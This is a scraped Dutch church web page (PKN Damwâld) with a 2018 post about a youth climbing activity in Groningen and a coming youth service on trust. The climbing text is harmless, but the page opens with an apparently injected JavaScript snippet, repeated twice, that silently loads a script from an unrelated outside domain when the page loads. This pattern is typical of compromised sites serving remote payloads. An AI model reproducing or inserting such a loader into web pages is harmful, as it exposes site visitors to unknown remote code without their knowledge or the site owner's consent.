;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mysteryactiviteit ... vertrouwen ! - PKN Damwâld

Mysteryactiviteit … vertrouwen !

Gepubliceerd op: maandag 12 maart 2018

Bergen als de Kilimanjaro of de Mout Everest kon de jeugdraad van beide PKN-kerken in Damwâld voor dit evenement helaas niet meer op tijd regelen, maar klimmen in een klimhal bleek ook een regelrechte uitdaging. Zaterdagavond was de Groningse klimhal Kardinge dan ook het toneel voor (weer) een zeer uitdagende mysteryactiviteit. Ruim 50 jongeren en een aantal volwassen ‘durfallen’ mochten ervaren hoe je techniek, veiligheid, organisatie, communicatie en vertrouwen moet/kunt combineren om  succesvol te  (wand-) klimmen. Klimmen, een leuke sport wat veel kracht en conditie van je vergt, betekent omhoog gaan en de top (proberen) te bereiken. Grensverleggend, want je bent op elkaar aangewezen en je moet de ander daarbij volledig vertrouwen.
Op 8 april 2018 gaan we in een jeugddienst – om 14.00 uur in De Ikker – aan de hand van deze ervaringen nadenken over het thema ‘vertrouwen’. Om het spannend te houden zijn maar een aantal foto’s toegevoegd. De mooiste actieportretten worden bij de dienst vertoont.